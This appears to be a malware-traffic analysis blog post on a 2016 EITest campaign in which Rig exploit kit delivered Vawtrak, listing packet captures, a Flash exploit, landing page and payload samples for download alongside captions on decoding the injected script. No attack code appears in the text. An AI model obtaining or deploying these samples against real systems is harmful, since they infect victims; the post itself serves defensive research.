2016-09-12 - EITEST RIG EK FROM 185.117.73.160 SENDS VAWTRAK

ASSOCIATED FILES:

  • 2016-09-12-EITest-Rig-EK-sends-Vawtrak.pcap   (450,514 bytes)
  • 2016-09-12-EITest-Rig-EK-flash-exploit.swf   (49,157 bytes)
  • 2016-09-12-EITest-Rig-EK-landing-page.txt   (3,405 bytes)
  • 2016-09-12-EITest-Rig-EK-payload-Vawtrak.exe   (172,032 bytes)
  • 2016-09-12-EITest-flash-redirect-from-copyrightfrance.top.swf   (4,317 bytes)
  • 2016-09-12-page-from-teatrebarcelona.com-with-injected-EITest-script.txt   (133,343 bytes)

 

NOTES:


Shown above:  Tweet from @tmmalanalyst on Thursday 2016-09-08 showing some obfuscation in the injected EITest script.


Shown above:  Tweet from @FreeBSDfan on Monday 2016-09-12 (today) with Pastebin link to image showing further obfuscation of the injected EITest traffic.

 

BACKGROUND ON THE EITEST CAMPAIGN:

 


Shown above:  Flowchart for this infection traffic.

 

TRAFFIC


Shown above:  Traffic from the pcap filtered in Wireshark.

 

ASSOCIATED DOMAINS:

 

FILE HASHES

FLASH FILES:

PAYLOAD:

 

IMAGES


Shown above:  Injected EITest script in page from the compromised website.

 


Shown above:  Take the variable from the script (the part with the % sign followed by double-digits/hex characters) to translate.
Easy enough to do at www.asciitohex.com.

 


Shown above:  EITest script translated from the variable.  EITest gate URLs highlighted in blue.

 


Shown above:  Alerts on this traffic in Security Onion using Suricata and the ET Pro ruleset.

 


Shown above:  Vawtrak artifacts and associated registry entry from the infected host.

 

FINAL NOTES

Once again, here are the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

Click here to return to the main page.